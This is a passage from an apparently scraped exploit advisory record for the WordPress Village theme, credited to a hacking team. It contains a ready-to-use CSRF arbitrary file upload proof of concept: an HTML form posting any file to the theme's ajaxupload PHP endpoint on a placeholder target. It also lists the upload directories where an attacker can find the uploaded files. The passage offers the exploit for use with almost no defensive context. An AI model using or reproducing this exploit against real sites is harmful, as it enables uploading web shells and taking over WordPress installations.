=> \n******************** \n{\"error\":\"No files were uploaded.\"} \n \n# CSRF File Upload Exploit Proof of Concept => \n****************************************** \n<form enctype=\"multipart/form-data\" \naction=\"VULNERABLESITEHERE/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php\" method=\"post\"> \nYour File: <input name=\"qqfile\" type=\"file\" /><br /> \n<input type=\"submit\" value=\"upload\" /> \n</form> \n \n# Directory File Paths : \n******************* \nSearch your files here in this folder. \n \n/wp-content/themes/village/blueprint/...... \n \n/wp-content/themes/village/...... \n \n/wp-content/uploads/[YEAR]/[MONTH]/..... \n \n/wp-content/uploads/...... \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151789/wpvillagethemes50-xsrfsql.txt"}]}
